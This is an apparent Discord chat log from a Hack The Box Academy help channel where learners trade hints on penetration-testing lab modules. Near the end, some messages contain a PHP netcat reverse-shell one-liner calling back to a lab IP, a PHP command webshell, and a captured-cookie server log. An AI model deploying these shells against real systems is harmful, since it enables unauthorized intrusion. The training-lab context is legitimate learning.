also based on the prices... if you don't have a subscription plan it's a whole lot cheaper to buy one instead of purchasing cubes (and you get Pwnbox usage with it).

i.e. 1000 cubes is $100. But you can purchase Platinum for $68 which comes with 1000 cubes and unlimited Pwnbox usage

low vine
#

yea trying to math it out, but I think by the end of this month I've got time to commit and hopefully take CBBH early january

#

so kinda annoying ><

rustic sage
# low vine Does student only have like a certain timeline?

ahhaha I don't think you understand what I'm trying to say. I don't think HTB Academy has a limit on the amount of times you can subscribe to a plan.

The subscription is monthly. SO what I mean is did your monthly subscription end and you need to renew? or was there some time left

low vine
#

I've been subscribed for like 10 months same method for payment, I dont actually know why it ended

#

Yea might just have to triple subscribe and unlock everything and get to work.

rustic sage
#

mhmm what does it say under the student plan

low vine
#

doesnt allow me to subscribe ot student anymore

rustic sage
#

weird.. I'd say contact support. Usually when it grays out it mean it doesn't recognize your email as a university email.

low vine
#

Yea just kinda odd / unsure

#

yea I had changed my email to a personal email once I finished school earlier this year. So guess it makes sense

rustic sage
low vine
#

was hoping to be able to pay student but its all good just find the most economical way forward and keep working

rustic sage
#

You'll either need to add your student email back if you still have access OR pay for a different plan.

low vine
#

Yea dont have access anymore, did you say you can triple stack?

#

subscriptions?

#

I.E I can triple subscrib the 68 / month so i can get access to waht I need?

rustic sage
#

I don't I pay for the student plan as I think it's the best deal

low vine
#

haha yea its obv the best deal

rustic sage
#

I'm not sure if you can "triple stack" subscriptions you'd have to ask someone else about that. You'd get 1000 cubes with that plan and unlimited Pwnbox time which I think should last you the month for working towards the CBBH or CPTS

#

and then it renews the next month and you'll get another 1000 cubes

low vine
#

yea ill figure it out, have a bunch of time atm so might just have to purchase some cubes to get it done

thorn urchin
low vine
#

Yea what I figured just gonna keep moving forward

#

Just confused me for a bit lol

pastel ginkgo
#

huh it shows you prices in USD? all my pricing is in euro

#

support told me they couldnt do anything about it lol

low vine
#

Rip lol

wheat garden
#

ive had very glitchy experience wit hacademy subscriptions too. Glitched out the user interface by switching to university email subscribing to student plan then switching back to regular email. didnt like that at all.

blissful verge
#

Happy weekend!

tidal mango
rustic sage
#

is anyone available for Shells & Payloads Host2? I feel like I'm missing something so small

wheat garden
#

I might be able to help

rustic sage
#

I'll send a dm I'm going to still need help on the above if anyone has completed the module.

thorn urchin
#

@vital adder I sent you my req file and my cmds I used

rustic sage
#

quick question do you still need to do the openvpn stuff if on attackbox

tidal mango
tidal mango
neon scaffold
brisk geode
#

Module: Web-Proxies
Problem: I did it correctly but the cookie get replaced with the default cookie instead of the payload one

rustic sage
#

Hello everyone! Someone could give me some hints on how to use a exploitdb module on metasploit ๐Ÿ˜ฆ

placid quest
#

@rustic sage dm me

rustic sage
#

Thanks, you too! & Where could I join in this page?

kind vessel
#

how can i connect to user forend? the module is Bleeding Edge Vulnerabilities from Active Directory Enumeration & Attacks

ripe terrace
vital adder
# brisk geode

you need to add ||3dac93b8cd250aa8c1a36fffc79a17a|| as a Prefix

vital adder
ripe terrace
#

@vital adder That's what I've been trying. ||Switching between Syn/Ack scans, changing the source port, using decoys, changing the timing profiles, etc.|| I haven't had any luck.

vital adder
#

hint use the ||source port|| show in the example

brisk geode
vital adder
#

the 1248 length in this section is with the flag

brisk geode
vital adder
# brisk geode

oh wait those cookie look right and putting the other thing as a Prefix just basically put it in front of the payload but if you do manually you don't need to add Prefix again so should already got the flag in this screenshot

twin gulch
#

Whatโ€™s wrong with my command?

brisk geode
#

i got it

#

ty

#

can i dm you if you dont mind?

vital adder
#

sure

twin gulch
#

Got it

oak sequoia
#

Hi! Not sure if this is the right place. But it is possible to change the dark font for light font in the Hack The Box Academy.

brisk geode
oak sequoia
#

Thank you!

twin gulch
#

Anyone for help at PTT attack ? At passwords attack module question 8

sturdy heath
#

Hello guys, i'm new to HTB can someone explain to me how do i get the root flag ?

#

oh no , i think this is kind of advanced for me

rustic sage
#

HI , I AM PRI ..I AM JUST A BEGINNER AND I DO NOT KNOW WHERE TO START FROM ...PLS HELP ME AND GUIDE ME ..
THANKS

sturdy heath
rustic sage
#

I AM LIKE I KNOW CODINGS AND ALL

sturdy heath
rustic sage
#

I JUST HAVE THE HACKING INTREST SO I REALLY WANT TO LEARN IT

#

HTB ?

#

ACADEMY?

#

LIKE HERE IN THE SERVER ?

sturdy heath
#

cause in the HTB it self it will ask u to get flags through priviliage escalation and those stuff

sturdy heath
rustic sage
#

TOO NEW

sturdy heath
rustic sage
#

OKAY

vital adder
# rustic sage HI , I AM PRI ..I AM JUST A BEGINNER AND I DO NOT KNOW WHERE TO START FROM ...PL...

@sturdy heath if you guys are new to this give both of this video a check too see what you can and should learn first
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM

Introductory video on getting into hacking and cybersecurity.

โ–ถ Play video

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

โ–ถ Play video
rustic sage
#

I finished my path!

#

The basic tools are so easy to understand now I've trudged through all the theory

vital adder
vital adder
rustic sage
#

THANKS

#

I could still use some help on Shells & Payloads Host2 if anyone remembers it

marble raft
#

Hi there people in the Blacklist Filters section of the File Uploads module, i've been trying to execute the php code, but it gets written as HTML on the page, any tips?

Even using a dedicated php list, all the ones who pass the blacklist filter don't execute code

rustic sage
twilit halo
#

hey guys, anyone here at Attacking Authentication Mechanisms module?

#

got stuck at skills assessment

rustic sage
#

what are you stuck with?!

#

already solved it

rustic sage
#

it`s the last step I guess ๐Ÿ˜ฆ

#

You can dm me if you're stuck

#

Thanks man

rustic sage
#

Good evening!

normal dune
#

hey guys

#

i need some help

rustic sage
#

with what module?!

rustic sage
#

Can I get a pointer to this? It's being super slow for me

#

@languid dawn uhh this link looks sketchy

acoustic owl
rustic sage
#

Sweet

acoustic owl
#

Possibly CheckShortURL is blocked.

vital adder
rustic sage
#

Is there wireless hacking or any form of WIFI module on Academy ?
I've tried searching, couldn't find it, perhaps it's named something else. Thanks.

acoustic owl
warm dagger
#

on the AD enum module, from the attack box (via rdesktop in kali) fping only returning 3 IPs, also, can't clone kerbrute. anyone else have that issue?

thorn urchin
#

pretty sure most of the sections only have 3 hosts up

warm dagger
thorn urchin
#

damn I dont remember any of em having 9, weird

thorn urchin
#

I remember one of the sections I had better luck with the native ping and just bash looping it, maybe that's the one youre on.

#

just cause theres that many alive in the section notes doesnt means it always matches with the assessment

warm dagger
#

git

thorn urchin
#

kerbrute should be preinstalled

#

and yeah the target machines dont have external internet access, you cant download anything from the provided attack boxes unless its the pwnbox itself

warm dagger
robust belfry
#

Is there like a general chat here?

thorn urchin
robust belfry
#

I acc canโ€™t open it

#

Or see it

thorn urchin
#

verify your account

pearl torrent
#

anyone have a nudge on grabbing the admin for the footprinting IMAP/POP3... I have all other answers but cant seem to figure out what I'm missing here.

vital adder
#

i don't know if this is the right method but if you found the admin username just add the target domain at the end

pearl torrent
#

I thought I did, but must not be correct

#

Ah.

vital adder
#

oh that was fast but congratz

pearl torrent
#

Yeah I found it earlier... there was one word to many in the part that mattered to not spoil to much. lol

rustic sage
#

Hello, could someone help me please? I'm at Web Attacks - Skills Assessment. I found the admin user. I want to change the password. However, I get back|| "Missing parameters" from Burp Suite. I added all the parameters (3) sent to the resetPassword() function on the /settings.php page in /reset.php.|| Thanks for the help in advance.

tiny ember
#

Question on the nmap module for the medium IDS/Firewall section. This question: "After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer. " Are they asking for BIND version or the OS version of the whole box?

#

I've also tried the service version on port 53 but to no avail

vital adder
vital adder
rustic sage
vital adder
#

hint all of them

tiny ember
#

๐Ÿ‘

rustic sage
#

but that's three, isn't it? ||body: uid=${$.cookie("uid")}&token=${json['token']}&password=${$("#new_password").val()}||

vital adder
vital adder
rustic sage
#

I understand thanks for the hint ๐Ÿ‘

brazen dust
#

All, I am having issues with defacing the website in the Cross-Site-Scripting (XSS) - Phishing Module, I am able to create the username and password field with using a payload appended with the html code but when I try to remove the image field like it says it doesn't remove it

vital adder
#

hint for that you don't need to remove the image field

brazen dust
#

In the clean up part?

vital adder
#

yep

brazen dust
#

ok thanks

thorn basin
#

hello

magic valve
#

May I get a nudge with Shells and Payloads โ€œThe live engagementโ€ host 3? I attempted the obvious exploit mentioned in the hints. Nothing. Attempted uploading asp webshell. Certutil is downloaded onto the machine but canโ€™t transfer over files/shell into the default directory path. Iโ€™ve been stuck for longer than I car to say. ๐Ÿ˜”

vital adder
#

i use the obvious one and it only work like half of the time for me so if it doesn't work for you use the same exploit, but module that only run 1 command at the time and you only need to run it twice for the flag

#

aslo off topic but anyone know which debian version i should use for parrot os 5.1.2 (not the htb version btw) on vmware?

magic valve
vital adder
#

sure

pastel ginkgo
#

whats a quick way to enumerate where you have write access to on windows computer?

low vine
#

Okay so I'm doing XSS - Session Hijacking or w/e and I've grabbed the admins cookie and I'm unsure of what I might have done wrong or why what I have gotten is not correct.
|||[Sat Dec 3 18:58:29 2022] PHP 8.1.13 Development Server (http://0.0.0.0:80) started
[Sat Dec 3 18:58:47 2022] 10.129.47.138:51404 Accepted
[Sat Dec 3 18:58:47 2022] PHP Warning: Undefined array key "0.0.0.0" in /tmp/tmpserver/login.php on line 7
[Sat Dec 3 18:58:47 2022] 10.129.47.138:51404 [200]: GET /login.php?c=cookie=c00k1355h0u1d8353cu23d
[Sat Dec 3 18:58:47 2022] 10.129.47.138:51404 Closing|||

#

I'm having a small misunderstanding on how to grab the flag from login.php? Plz help ty love all of you โค๏ธ

sly tapir
#

man, ive gotten so far on this web attacks module (skills assessment) without looking at anything and now im stuck...anyone got a hint? im logged in as admin looking at events page

pastel ginkgo
#

@vital adder Have you done the AD enumeration module yet?

vital adder
#

about to but still nope

pastel ginkgo
#

darn the skills assessments are tough as nails

#

trying to figure out how to PE from a xp_cmdshell

vital adder
vital adder
thorn urchin
pastel ginkgo
#

I think I found an ipsec video with the way to do it

sly tapir
pastel ginkgo
#

will let you know in 10 lol

vital adder
pastel ginkgo
#

@thorn urchin I got it, i'll dm you how if your interested. Got NT system authority

thorn urchin
#

sure, I used a cheesey easy way, curious what your way was

pastel ginkgo
#

Is it possible to do a pth attack from a rev shell?

#

nvm I have another idea

thorn urchin
#

to answer anyways, depends on the shell and the scenario.

pastel ginkgo
#

how do you do a local login for rdp I've tried ./

#

I made a local user and want to see if I can login to my new user, then use mimi to pth to the other workstation

wheat garden
#

anyone able to provide assistance with Attacking Common Services - Hard?

I am trying to interact with the sql linked server and enable XP_CMDSHELL and then possibly read the flag but im not sure on the command syntax and how it needs to be formatted?

thorn urchin
pastel ginkgo
thorn urchin
#

dunno, I dont think I used rdp once in the assessment

pastel ginkgo
#

I used it on MS01 I dont think I ever got anything useful out of it when I think about it

#

I was able to steal some usless ntlm hashes

thorn urchin
#

my notes got a little fuzzy around there as I got excited and blitzed towards the end. I remember generally what I did, but I dont remember what host was which lol

wheat garden
# pastel ginkgo xp_cmdshell <cmd>

you finished attacking common services module? but not that simple gotta run something like

EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]

pastel ginkgo
#

that must be nice as Im not making any progress lol

#

I can get mimikats to run pth but I cant get output from it

thorn urchin
#

well remember it doesnt necessarily matter where you run pth from, so long as you have the relevant hash

pastel ginkgo
#

I have the administrator hash

#

but I cant do a pth on m01 as mimi wont work properly

#

on sq01 it runs but my rev shell wont let me pass input to the new shell

thorn urchin
#

just do it from your attack host

pastel ginkgo
#

you can run mimikatz from linux?

thorn urchin
#

almost every impacket tool will accept ntlm hashes for pth variant of whatever they do

pastel ginkgo
#

hmm let me look up more impacket tools

thorn urchin
#

at the very least itll get you a more sane shell if youre at where I think you are

pastel ginkgo
#

I just straight up brute forced that module, it kinda felt like crap

wheat garden
pastel ginkgo
#

sure

wheat garden
#

getting this error message when I try

Your message could not be delivered. This is usually because you don't share a server with the recipient or the recipient is only accepting direct messages from friends. You can see the full list of reasons here: https://support.discord.com/hc/en-us/articles/360060145013

wheat garden
low vine
#

Been working on this XSS Session Hijacking session for about 4 hours now. If anyone is willing I'd love a nice ELI5. I've confirmed vulnerable blind xss parameter, I've hosted teh script on local server I'm hosting and I have not been able to reach out and grab the cookie from the admin user. I'm very close but need a bit of ELI5 help as I'm definitely missing something

#

I somehow got the cookie 1 time but I am not able to repeat and its obvious I'm lacking some understanding and would love some help ty โค๏ธ

lucid bloom
brisk geode
#

Enumerate the target and find a vHost that contains flag No. 3. Submit the flag value as your answer (in the format HTB{DATA}).

anyone knows how to fix that? module: Information Gathering - Web Edition

i got the first 2 flags

pseudo anchor
#

Need help with the Skills Assessment part of Using Web Proxies for the question 3 :
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I tried to fuzzle the answer by prefixing the 31 characters long decoded cookie and then encoding it 2 times, but I can't get it to work

loud sapphire
pseudo anchor
#

I added the list of possible characters, then added as payloads the prefix of 31 characters and the 2 encryptions in that order, which gave me a string of 88 characters as indicated in the hint. However all the responses I get are the same length. Did I miss something ?

feral stump
#

If so dm to share your command

#

And see what we can do

brisk geode
bronze lion
#

Hello What Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer. I change script for range() function to work from 376370-376380 with step 1 but do not show any result. ๐Ÿ™‚

rustic sage
#

Can I get some help on enumeration? I'm struggling to understand the IDS/IPS Evasion and could use some aid in how to get a System OS from filtered ports.

Network Enumeration -> Firewall and IDS/IPS Evasion - Easy Lab

#

I have read through the module a few times, but I think I'm just ticking over in the head a bit maybe ^^;

rustic sage
#

Yep

strange aspen
# rustic sage Yep

i think the solution was under the mentioned "Used Scanning Options" u should use the source port thing and an ack scan i think but its a long time ago im not sure

rustic sage
#

Oh yeah I know- but I was more looking to see if anyone had the time to explain it further to me

strange aspen
#

what exactly?

rustic sage
#

Well I wanted to understand how the DNS Proxying actually works

#

On a logical level

#

Like how come it works whilst using Fragmentation and Timing doesn't when you're trying to find Information ?

strange aspen
#

in the first case nmap calls another dns server that is more trusted in the second nmap pretends to be a dns server by using port 53 as source port..

mellow turtle
#

i need help with AD Enumeration & Attacks - Skills Assessment Part II

native jackal
#

Hi, my name is Sarah and I was wondering if anyone could help me out with solving the question in the one before last section ("Shellcoding Tools") of "Intro To Assembly Language".
I'm extremely stuck there, have been pretty much trying for a couple of hours and still cant find the right way to solve it. I'd appreciate anything, especially if one could guide me to the solution (in case of voice call, ill be available in 2 hours from now), and even just the answer itself might help get me on the correct track.
thank you! โค๏ธ

strange aspen
#

im at the "skills assesment-service login" of "login brute forcing" can someone give me a hint how to build the personalized wordlist i tried a lot already..

mellow turtle
#

@strange aspen ?

#

that question or the previous one

strange aspen
#

As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.

thorn urchin
mellow turtle
#

@strange aspen

#

didnt take notes of that module sorry

strange aspen
bronze lion
#

@thorn urchin Sorry, got the id wrong. in the script i iterate over the range (736370-736380 ) with step 1:)

rustic sage
#

Thanksthanks

mellow turtle
#

@strange aspen still need help?

strange aspen
mellow turtle
#

go dm

undone cypress
#

Hello!
For questions - AD Enumeration & Attacks - Skills Assessment Part II
I have only two steps left to take.
Logining to DC01, taking the flag and get the NTLM hash for the KRBTGT account.
But I can't figure out how to get to DC01.
On the MS01 machine, I am a full-fledged administrator.
How to move to DC01 with her?
Maybe you need to add a user on DC01 to the "Remote Management Users" group, but how?๐Ÿค”

rustic sage
#

Hello, I'm at Web Attacks - Skills Assessment. I found the admin user and tried to change the password. But I get the message Access Denied. I tried to change the cookie UID to ||52|| in the browser. It says I'm the admin user but I don't have any advanced options. Do I still have to change the password?

sly tapir
rustic sage
mellow turtle
#

@undone cypress can i dm you?

undone cypress
rustic sage
#

Having issues with getting past a tcp wrapped service in Enumeration, I've used NMAP and NCAT but NCAT just time out on me- can anyone point me in the right direction?

rustic sage
#

Enumeration-> Avoiding IPS/IDS Hard Lab

kind turret
#

try connecting to that service using nc

#

And, don't forget changing the source port.

rustic sage
#

I've been using NC and it's timing out- is that an issue with what I'm doing or an issue with my internet-

kind turret
#

What is the source port that you are instructing nc to use when attempting to connect?

rustic sage
#

50000

#

Which is the tcpwrapped service I'm trying to get the version and name of

kind turret
#

That is the destination port, not the source port...

rustic sage
#

Ah sorry, source port is 53

kind turret
#

Set the source address to your IP and you should be good to go

rustic sage
#

Roger, Roger!

#

Thanks ^^

kind turret
#

How about changing the password for the domain admin then connecting using wmiexec.py?

#

Question 11 or?

#

You crack the hash in there

#

Inveigh.ps1?

proud pine
#

Couldn't find the hash in memory

#

Wasn't roastable

rustic sage
kind turret
kind turret
proud pine
#

I can't remember if I did or not. If that was the answer, then I feel like I should have figured it out.

#

but I feel like I remember that the CT*** user had no persistence, so that doesn't seem right.

kind turret
proud pine
#

Can I DM you?

kind turret
#

Sure

pastel ginkgo
#

@thorn urchin Finally finished it, wow what a "assessment" that was a full on box lol

rustic sage
kind turret
rustic sage
#

I changed the uid, token and cookie uid

kind turret
#

But are they sent with the query string or?

#

If they are still sent within the request body it won't work

kind turret
#

Delete your message as this spoils the question.

#

DM me I will help you.

bitter wraith
#

Hi guys, I'm having problems in the File Upload Attacks Module - Whitelist Filters exercise. I am able to upload the file but I keep getting"Not Found" responses when browsing to it's address in ||/profile_images||

#

A helping hand would be great, thanks

thorn urchin
#

if its one of the \x00 in the extension name itll pass but its no good

bitter wraith
#

/ , .\ , :

thorn urchin
#

did you try the bash script wordlist generator they give you?

bitter wraith
#

I tried using the extensions

thorn urchin
#

did you use the generator script from the lesson

kind turret
#

Disabled URL-encoding option in Burp?

vital adder
bitter wraith
thorn urchin
#

it does work, youre misunderstanding

bitter wraith
#

Yeah, I'm confused

thorn urchin
#

there are some variations that will work, and some that dont depending on the situation

#

now again

#

yes or no

vital adder
thorn urchin
#

did you use the bash script they give you to generate a wordlist?

bitter wraith
#

Yeah

thorn urchin
#

okay good

#

now use it, and add a couple more valid php extensions ๐Ÿ™‚

bitter wraith
#

Thanks, I will now try it ๐Ÿ˜„

kind vessel
#

i try to do the first question of Meterpreter Tunneling & Port Forwarding but i only have 1 IP in return or 0

magic rapids
#

Please can anyone here help me track a stolen phone ๐Ÿ“ฑ๐Ÿ™๐Ÿ™๐Ÿ™am still new please ๐Ÿ™

vital adder
#

nope

vital adder
magic rapids
#

Ok thanks

vital adder
#

np๐Ÿคฃ

bitter wraith
#

They're all "only images are allowed"

patent whale
#

Hello! Could anyone give me a small hint for the Password Attacks Lab - Easy? Nmap found just FTP and SSH. Tried Bruteforcing FTP first, as that is quicker and more reliable than SSH. I used the provided username.list and password.list, crated mutations with provided custom.rules, no yield. I can bruteforce SSH as well, but that would probably take much longer than the machine timeout. Tried some default passwords and modifications, no results either.

placid quest
#

@patent whale ftp allows anonymous login

patent whale
#

What? I swear that was the first thing I tried and didn't get in. Will try again.

pastel ginkgo
patent whale
#

Did -t 64 for FTP.

pastel ginkgo
#

try resetting the box and you shouldnt need to run the modified password list here

patent whale
#

Reverted the machine, trying again. We'll see. Thanks for the tips, @pastel ginkgo and @placid quest

pearl torrent
#

anyone can DM real quick about footprinting medium lab?

#

nvm.

mellow turtle
#

@pearl torrent what do u need?=

pearl torrent
#

I figured it out lol

mellow turtle
#

nice

vital adder
# bitter wraith I did go over it and changed the filename to make sure it was in sync but none o...

so i just give that section a try and i did use the bash script do make the wordlist but instead of 2 extension i use all extension from the web-extensions.txt (in seclist) and that give me 1404 extension and when upload 574 work but only 4 give me RCE but the first time i do this i just manually try the extension burp repeater or something and that work me

update: i was able to get 12 RCE shell working by adding some extension into web-extensions.txt

kind vessel
vital adder
#

sure

brisk geode
#

W fr

manic pilot
#

Anyone able to give me a push on the SQL Injection Skills Assessment, the last exercise? Have RCE but stuck on priv escalation to read the flag in the root directory

random haven
#

hi

manic pilot
rustic sage
#

Could I DM someone who has completed Password Attacks Network Services?

rustic sage
#

good afternoon everyone, I am a bit stuck on this exercise, I have tried to decode the cookie in burp suite and in online decoders and it has not been possible, I ask for some guidance thank you very much.

The /admin.php page uses a cookie that has been encoded several times. It tries to decode the cookie until it gets a value of 31 characters. It sends the value as a response.

Skills Assessment - Using Web Proxies

rough tinsel
#

@red obsidian not sure if this is the correct spot, but I haven't been able to purchase cubes, subscribe, or purchase a model on HackTheBox Academy for the last 3 days. Not sure if there's an issue on their side or mine. Anyone else experience this currently?

rustic sage
#

This SSH attack is going to take 25hrs max

sadglas

placid quest
#

@rustic sage which ssh

rustic sage
#

Brute forcing module

#

Using CUPP

sly tapir
#

it shouldnt take that long

brazen dust
#

Stuck on Blind Site Scripting Lab, has anyone done that lately that could point me in the right direction

candid drum
#

netcat dosen't print back reverse shell (doing nibbles box), how do i check my tun0 vpn ip to make sure it's correct?

rustic sage
#

Unless someone can DM me the pass to speed it up, I'm gonna have to wait

#

Probably password1 or something

#

oop it just finished

sly tapir
rustic sage
#

Got the password thankfully hehehe

sly tapir
#

nice!

flat oxide
#

Someone for "Attacking Common Services - Hard" section?

placid quest
#

@flat oxide where are u stuck

flat oxide
#

I found the linked server and the testadmin user

#

But I don't know where find any admin credentials

feral stump
#

Remember to switch || / from Windows to \ in Linux||

#

And || no C: ||

placid quest
#

@flat oxide do u think it is like that

flat oxide
#

so idk

lament hollow
#

So I'm sure this is a total noob question but... With attacking AD, after I've done the DCSync, grabbed KRBTGT and made a golden ticket, how do I use that golden ticket to actually access things like... Say I want to check Filesystem on the Domain Controller.

pastel ginkgo
#

If your on linux you point your KBCCNAME to it

#

it should get passed when you authenticate

lament hollow
#

I'm on a windows host. I've loaded the ticket for domain\Administrator into memory and tried SMB and WinRM (remote powershell) but both failed. Can't even hit a c$ share.

#

klist is showing the right tickets, I'm just not having much luck using it to actually access anything on the DC

grizzled cobalt
#

I'm working on the IDS/IPS Evasion - Easy module. I can work out that it's a LInux machine, but that's not the correct answer so I can only assume it wants the distribution. Does anyone have any tips for how to determine that?

pastel ginkgo
#

id recommend getting intimately familiar with nmap you will use it on every.single.machine.

lament hollow
#

I think I got it

pastel ginkgo
#

you asked the very same question I did when I was going through that module

#

good luck on the assessment its a beast.

vital adder
vital adder
candid drum
vital adder
#

oh that one

vital adder
candid drum
#

so i put a reverse shell in a php file and uploaded it as an image to the website (it uploads fine and prints text if i make it do that), but netcat won't pickup the code when listening

reverse shell code: <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>

vital adder
vital adder
candid drum
#

yes

vital adder
#

use this php payload to get RCE and from there it's easier to get a rev shell <?php system($_GET['cmd']); ?>

vital adder
#

use ?cmd= to run command

candid drum
#

where?

vital adder
#

at the end of your payload

#

so (your payload name).php?cmd=id to run the id command

candid drum
#

<?php system($_GET['cmd']); (shell).php?cmd=id?>
?

vital adder
#

i got 0 idea what you are trying to do here?

candid drum
#

lemme dm you

vital adder
#

sure

pastel ginkgo
#

On the Using Web Proxies module, how do I solve the burp intruder question using something like gobuster. I dont feel like repeating the password attacks module and sitting here all night

#

As I thought I was running gobuster correctly and I found index.html but the page is blank

vital adder
#

it's easier to use ffuf instead of gobuster for this(nvm i forgot about the -x) and if you still want to intruder but don't want to wait remove the first ||100|| word

pastel ginkgo
#

intruder is already at 215 results and no hits yet

#

im not super familiar with ffuf

vital adder
#

let me give this a check and i'll try with ffuf after that i'll send you the command but for the fuzzing you can use something like /admin/FUZZ.html

vital adder
vital adder
pastel ginkgo
#

Sweet found it both ways at the same exact time

#

learned a tool I will actually use vrs one I wont use because of the paywall for intruder

rustic sage
#

im having some trouble with shell & payload skill assessment host 3

i got antak.aspx to work but it cant read the flag in C:\Users\Administrator\Desktop\Skills-flag.txt because it has no admin priviledge

eternal blue doesnt work so i tried admin/smb/ms17_010_command
with the command: cat C:\Users\Administrator\Desktop\Skills-flag.txt

everything works fine but it doesnt print the output in metasploit

thorn urchin
vital adder
pastel ginkgo
#

Is the ffuf module good at covering those use cases?

rustic sage
#

oh yeah right

thorn urchin
vital adder
thorn urchin
#

ofc